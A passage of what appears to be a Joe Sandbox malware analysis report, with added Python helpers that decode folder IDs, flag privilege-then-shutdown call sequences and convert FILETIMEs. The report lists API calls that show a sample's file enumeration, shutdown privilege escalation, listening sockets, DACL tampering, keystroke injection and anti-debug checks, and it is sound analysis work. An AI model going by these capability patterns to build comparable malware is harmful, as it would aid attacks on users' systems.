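    0x2B: "CSIDL_PROGRAM_FILES_COMMON",
    0x2E: "CSIDL_COMMON_DOCUMENTS",
}
CSIDL_ID_MASK = 0xFF  # high bits of nFolder carry flags such as CSIDL_FLAG_CREATE (0x8000)

SHUTDOWN_APIS = {"ExitWindowsEx", "InitiateSystemShutdownExW", "SetSystemPowerState"}


class ApiCall(NamedTuple):
    api: str
    module: str
    args: List[str]
    ref: int  # call-site address from "ref:"


def parse_calls(listing: str) -> List[ApiCall]:
    """Return the calls of a listing in report order; header lines are skipped."""
    calls = []
    for line in listing.splitlines():
        m = _CALL_RE.search(line)
        if not m:
            continue
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw else []
        calls.append(ApiCall(m.group("api"), m.group("module"), args, int(m.group("ref"), 16)))
    return calls


def folders_requested(calls: List[ApiCall]) -> List[str]:
    """Resolve nFolder (second argument) of each SHGetFolderPathW call to its CSIDL name."""
    names = []
    for c in calls:
        # "?" is the report's marker for an argument the analyzer could not resolve.
        if c.api == "SHGetFolderPathW" and len(c.args) >= 2 and c.args[1] != "?":
            n = int(c.args[1], 16) & CSIDL_ID_MASK
            names.append(CSIDL.get(n, f"CSIDL_0x{n:02X}"))
    return names


def privilege_then_shutdown(calls: List[ApiCall]) -> Optional[Dict[str, List[str]]]:
    """Flag LookupPrivilegeValue -> AdjustTokenPrivileges -> shutdown API, in call order."""
    privileges, adjusted, shutdown = [], False, []
    for c in calls:
        if c.api.startswith("LookupPrivilegeValue") and len(c.args) >= 2:
            privileges.append(c.args[1])  # lpName, e.g. SeShutdownPrivilege
        elif c.api == "AdjustTokenPrivileges" and privileges:
            adjusted = True
        elif c.api in SHUTDOWN_APIS and adjusted:
            shutdown.append(c.api)
    return {"privileges": privileges, "shutdown_apis": shutdown} if shutdown else None


# Sample input: lines copied from the two listings above.
FOLDER_LISTING = """\
APIs
• GetLocalTime.KERNEL32(?), ref: 004722A2
• SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,0048BF68), ref: 004724EC
• SHGetFolderPathW.SHELL32(00000000,0000002B,00000000,00000000,0048BF68), ref: 00472506
• SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,0048BF68), ref: 00472520
• SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,0048BF68), ref: 0047253A
"""

SHUTDOWN_LISTING = """\
APIs
• GetCurrentProcess.KERNEL32(00000028,?), ref: 004333CE
• OpenProcessToken.ADVAPI32(00000000), ref: 004333D5
• LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004333EA
• AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0043340E
• GetLastError.KERNEL32 ref: 00433414
• ExitWindowsEx.USER32(?,00000000), ref: 00433437
• InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?), ref: 00433466
• SetSystemPowerState.KERNEL32(00000001,00000000), ref: 00433479
"""

if __name__ == "__main__":
    print(folders_requested(parse_calls(FOLDER_LISTING)))
    print(privilege_then_shutdown(parse_calls(SHUTDOWN_LISTING)))
```

Run against the full SHGetFolderPathW block, the nine nFolder values resolve to CSIDL_PROGRAM_FILES, CSIDL_PROGRAM_FILES_COMMON, CSIDL_PERSONAL, CSIDL_COMMON_APPDATA, CSIDL_COMMON_DESKTOPDIRECTORY, CSIDL_COMMON_DOCUMENTS, CSIDL_COMMON_FAVORITES, CSIDL_COMMON_PROGRAMS and CSIDL_COMMON_STARTMENU, i.e. the all-users locations plus Program Files and the user's Documents folder, which is the set a file-enumeration routine would walk. The 0xFF mask matters because nFolder can OR in CSIDL_FLAG_CREATE and similar flags; none are set in this listing, but a masked lookup keeps the decoder correct for samples that do set them.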
APIs
  • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00436E45
  • Part of subcall function 00436E2B: GetLastError.KERNEL32(?,00000000,?), ref: 00436E4F
  • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00436E75
  • Part of subcall function 00436DF7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00436E12
• GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0044618A
• GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004461BE
• GetLengthSid.ADVAPI32(?), ref: 004461D0
• GetAce.ADVAPI32(?,00000000,?), ref: 0044620D
• AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00446229
• GetLengthSid.ADVAPI32(?), ref: 00446241
• GetLengthSid.ADVAPI32(?,00000008,?), ref: 0044626A
• CopySid.ADVAPI32(00000000), ref: 00446271
• AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004462A3
• SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004462C5
• SetUserObjectSecurity.USER32(?,00000004,?), ref: 004462D8
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
• String ID:
• API String ID: 1255039815-0
                                                                                                                                                                  • Opcode ID: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                                                                                                                                                  • Instruction ID: cbecfdc94e872455e881353a2ef69e95113e06a92746e25f2a634f38edc45108
                                                                                                                                                                  • Opcode Fuzzy Hash: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                                                                                                                                                  • Instruction Fuzzy Hash: C251BC71A00209BBEB10EFA1CD84EEFB778BF49704F01855EF515A7241D6B8DA05CB69
APIs
• FindFirstFileW.KERNEL32(00000000,?,?), ref: 004788E4
• FindClose.KERNEL32(00000000), ref: 00478924
• FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478949
• FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478961
• FileTimeToSystemTime.KERNEL32(?,?), ref: 00478989
Strings
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: FileTime$FindLocal$CloseFirstSystem
• String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
• API String ID: 3238362701-2428617273
• Opcode ID: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
• Instruction ID: 8fd0730747e081185947bc4026d2fd3d0a29cbe563c255e8678d3cf3417a7967
• Opcode Fuzzy Hash: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
• Instruction Fuzzy Hash: 32719772204300ABC310EF55CC85FAFB7E9AF88705F504D2FF645962D1E6B9E944875A
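Added example, not part of the Joe Sandbox report or of the analysed sample: the values that FileTimeToLocalFileTime and FileTimeToSystemTime convert in the function above are Windows FILETIMEs, 100-nanosecond ticks since 1601-01-01 00:00:00 UTC, and the function then renders them with the "%4d%02d%02d%02d%02d%02d" layout listed under its String ID. The Python below converts a raw FILETIME low/high DWORD pair to a datetime and back and prints it in that same layout. The Unix-epoch FILETIME used as input is a constructed test value, and the `tz` parameter is this example's stand-in for FileTimeToLocalFileTime: the sample applies the victim host's own time-zone bias, so identical file times produce different strings on different machines, which matters when correlating such timestamps across hosts.

```python
"""FILETIME <-> datetime conversion, mirroring FileTimeToSystemTime and the
"%4d%02d%02d%02d%02d%02d" format string seen in the function listing above."""
from datetime import datetime, timedelta, timezone

# FILETIME counts 100-ns intervals since 1601-01-01 00:00:00 UTC.
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)
TICKS_PER_MICROSECOND = 10


def filetime_to_datetime(low, high, tz=timezone.utc):
    """Combine the dwLowDateTime/dwHighDateTime pair into a datetime.

    `tz` plays the role of FileTimeToLocalFileTime (assumption of this example):
    the sample uses the host's local zone, so results differ per victim.
    Defaulting to UTC keeps timestamps from different hosts comparable.
    """
    ticks = ((high & 0xFFFFFFFF) << 32) | (low & 0xFFFFFFFF)
    dt = FILETIME_EPOCH + timedelta(microseconds=ticks // TICKS_PER_MICROSECOND)
    return dt.astimezone(tz)


def datetime_to_filetime(dt):
    """Inverse conversion; returns the (low, high) DWORD pair."""
    if dt.tzinfo is None:
        raise ValueError("naive datetime: a time zone is needed to build a FILETIME")
    delta = dt.astimezone(timezone.utc) - FILETIME_EPOCH
    seconds = delta.days * 86400 + delta.seconds
    ticks = seconds * 10_000_000 + delta.microseconds * TICKS_PER_MICROSECOND
    return ticks & 0xFFFFFFFF, ticks >> 32


def format_sample_style(dt):
    """YYYYMMDDhhmmss, the layout of the sample's "%4d%02d%02d%02d%02d%02d" string."""
    return "%4d%02d%02d%02d%02d%02d" % (dt.year, dt.month, dt.day,
                                         dt.hour, dt.minute, dt.second)


# Constructed input: the FILETIME of the Unix epoch (1970-01-01 00:00:00 UTC),
# 116444736000000000 ticks, split into its low and high DWORDs.
UNIX_EPOCH_FILETIME = (0xD53E8000, 0x019DB1DE)

if __name__ == "__main__":
    stamp = filetime_to_datetime(*UNIX_EPOCH_FILETIME)
    print(format_sample_style(stamp), datetime_to_filetime(stamp))
```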
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0045D627
• GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?), ref: 0045D6B5
• GetLastError.KERNEL32 ref: 0045D6BF
• SetErrorMode.KERNEL32(00000000,?), ref: 0045D751
Strings
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: Error$Mode$DiskFreeLastSpace
• String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
• API String ID: 4194297153-14809454
• Opcode ID: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
• Instruction ID: 1f300c266cb1daf6abeae651b696e439ee3a0372042695327ab67fb83666ce96
• Opcode Fuzzy Hash: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
• Instruction Fuzzy Hash: FE418235D00209DFCB10EFA5C884A9DB7B4FF48315F10846BE905AB352D7799A85CB69
APIs
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: Clipboard$AllocCloseEmptyGlobalOpen
• String ID:
• API String ID: 1737998785-0
• Opcode ID: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
• Instruction ID: d84b136cee2c902db59abfe4f82a3f409d39725fe24efd6a62fd8a04edebb5dd
• Opcode Fuzzy Hash: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
• Instruction Fuzzy Hash: 334114726001119FC310EFA5EC89B5EB7A4FF54315F00856EF909EB3A1EB75A941CB88
APIs
• GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
• GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
• SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
  • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,0040355C,?,?,?,00000010), ref: 00403B08
  • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,00000010), ref: 00403B41
Strings
• #include depth exceeded. Make sure there are no recursive includes, xrefs: 00428200
• _, xrefs: 0040371C
• Error opening the file, xrefs: 00428231
• Unterminated string, xrefs: 00428348
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: ByteCharCurrentDirectoryMultiWide$FullNamePath
• String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
• API String ID: 522955547-188983378
• Opcode ID: 3c35638c99be18d835dc8bf7441536bb52d07af4118373316f30b647345e0f32
• Instruction ID: 51a390cb75b153cc6cab8b26b712b327f6f81406d0e69f910df9a3585dc9283e
• Opcode Fuzzy Hash: 3c35638c99be18d835dc8bf7441536bb52d07af4118373316f30b647345e0f32
• Instruction Fuzzy Hash: CCD105B1508341AAD710EF64D841AEFBBE8AF85304F404C2FF98553291DB79DA49C7AB
APIs
• FindResourceW.KERNEL32(?,?,0000000E), ref: 004330A5
• LoadResource.KERNEL32(?,00000000), ref: 004330BD
• LockResource.KERNEL32(00000000), ref: 004330CA
• FindResourceW.KERNEL32(?,?,00000003), ref: 004330F7
• LoadResource.KERNEL32(?,00000000), ref: 00433105
• SizeofResource.KERNEL32(?,00000000), ref: 00433114
• LockResource.KERNEL32(?), ref: 00433120
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: Resource$FindLoadLock$Sizeof
• String ID:
• API String ID: 4215241788-0
• Opcode ID: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
• Instruction ID: 48d2d5a3af9b637b7fc6f2c6b5a7fdd3517197a5f8dc2ef3994740021b7ed835
• Opcode Fuzzy Hash: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
• Instruction Fuzzy Hash: C741F1322002146BDB10EF65EC84FAB37ADEB89321F00846BFD01C6245E779DA51C7A8
                                                                                                                                                                  APIs
                                                                                                                                                                  • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 0046530D
                                                                                                                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 0046531C
                                                                                                                                                                  • bind.WSOCK32(00000000,?,00000010), ref: 00465356
                                                                                                                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00465363
                                                                                                                                                                  • closesocket.WSOCK32(00000000,00000000), ref: 00465377
                                                                                                                                                                  • listen.WSOCK32(00000000,00000005), ref: 00465381
                                                                                                                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 004653A9
                                                                                                                                                                  • closesocket.WSOCK32(00000000,00000000), ref: 004653BD
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLast$closesocket$bindlistensocket
                                                                                                                                                                  • String ID:
                                                                                                                                                                  APIs
                                                                                                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 004524DF
                                                                                                                                                                  • Sleep.KERNEL32(0000000A), ref: 0045250B
                                                                                                                                                                  • FindNextFileW.KERNEL32(?,?), ref: 004525E9
                                                                                                                                                                  • FindClose.KERNEL32(?), ref: 004525FF
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Find$File$CloseFirstNextSleep
                                                                                                                                                                  • String ID: *.*$\VH
                                                                                                                                                                  APIs
                                                                                                                                                                  • IsDebuggerPresent.KERNEL32 ref: 00421FC1
                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00421FD6
                                                                                                                                                                  • UnhandledExceptionFilter.KERNEL32(pqI), ref: 00421FE1
                                                                                                                                                                  • GetCurrentProcess.KERNEL32(C0000409), ref: 00421FFD
                                                                                                                                                                  • TerminateProcess.KERNEL32(00000000), ref: 00422004
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                  • String ID: pqI
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00420494: SetFilePointer.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,0042D7C1,0042D7C1,?,0041B188,00000000,00000000,00000000,00000002,00000000,00000002), ref: 004204D6
                                                                                                                                                                    • Part of subcall function 00420494: GetLastError.KERNEL32(?,0041B188,00000000,00000000,00000000,00000002,00000000,00000002,00000000,?,0041B847,00000000,?,0042D7C1,0048D260,00000010), ref: 004204E3
                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00001000,?,?,?,?,?,00000000,00000109,00000000,?,?,004227D8,00000109,00000000), ref: 00423943
                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00000000,00000109,00000000,?,?,004227D8,00000109,00000000), ref: 0042394A
                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000,00000109,00000000,?,?,004227D8), ref: 004239C6
                                                                                                                                                                  • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000,00000109,00000000,?,?,004227D8,00000109), ref: 004239CD
                                                                                                                                                                  • SetEndOfFile.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000,00000109,00000000,?,?,004227D8), ref: 00423A28
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,00000109,00000000,?,?,004227D8,00000109), ref: 00423A55
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Heap$ErrorFileLastProcess$AllocFreePointer
                                                                                                                                                                  • String ID:
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetKeyboardState.USER32(?), ref: 0044C3D2
                                                                                                                                                                  • SetKeyboardState.USER32(00000080), ref: 0044C3F6
                                                                                                                                                                  • PostMessageW.USER32(00000000,00000101,?,?), ref: 0044C43A
                                                                                                                                                                  • PostMessageW.USER32(00000000,00000105,?,?), ref: 0044C472
                                                                                                                                                                  • SendInput.USER32(00000001,?,0000001C), ref: 0044C4FF
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: KeyboardMessagePostState$InputSend
                                                                                                                                                                  • String ID:
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                                                                                                                                                                  • socket.WSOCK32(00000002,00000002,00000011,?,00000000), ref: 0047666F
                                                                                                                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00476692
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                   • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLastinet_addrsocket
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4170576061-0
                                                                                                                                                                  • Opcode ID: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                                                                                                                                                                  • Instruction ID: b6cffcacb6afaf0b8cd9bee7f3c7ce362d61c656181a10c6507bcc72ef542d5a
                                                                                                                                                                  • Opcode Fuzzy Hash: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                                                                                                                                                                  • Instruction Fuzzy Hash: 604129326002005BD710EF39DC86F5A73D59F44728F15866FF944AB3C2DABAEC418799
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                                                                                                                                  • IsWindowVisible.USER32 ref: 0047A368
                                                                                                                                                                  • IsWindowEnabled.USER32 ref: 0047A378
                                                                                                                                                                  • GetForegroundWindow.USER32(?,?,?,00000001), ref: 0047A385
                                                                                                                                                                  • IsIconic.USER32 ref: 0047A393
                                                                                                                                                                  • IsZoomed.USER32 ref: 0047A3A1
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                   • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 292994002-0
                                                                                                                                                                  • Opcode ID: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                                                                                                                                                                  • Instruction ID: 143e3079ffab126fd184b85051f6534cdea6adf6d01d93e69c1b4810180b6228
                                                                                                                                                                  • Opcode Fuzzy Hash: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                                                                                                                                                                  • Instruction Fuzzy Hash: 8F11A2322001119BE3219F2ADC05B9FB798AF80715F15842FF849E7250DBB8E85187A9
                                                                                                                                                                  APIs
                                                                                                                                                                  • CoInitialize.OLE32(00000000), ref: 00478442
                                                                                                                                                                  • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0047845B
                                                                                                                                                                  • CoUninitialize.OLE32 ref: 0047863C
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                   • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CreateInitializeInstanceUninitialize
                                                                                                                                                                  • String ID: .lnk
                                                                                                                                                                  • API String ID: 948891078-24824748
                                                                                                                                                                  • Opcode ID: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
                                                                                                                                                                  • Instruction ID: cf4755465b87a828534c2837f83e1451e93ee4f6fe559e45c0b7480b45348b92
                                                                                                                                                                  • Opcode Fuzzy Hash: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
                                                                                                                                                                  • Instruction Fuzzy Hash: 17816D70344301AFD210EB54CC82F5AB3E5AFC8B18F10896EF658DB2D1DAB5E945CB96
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                   • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
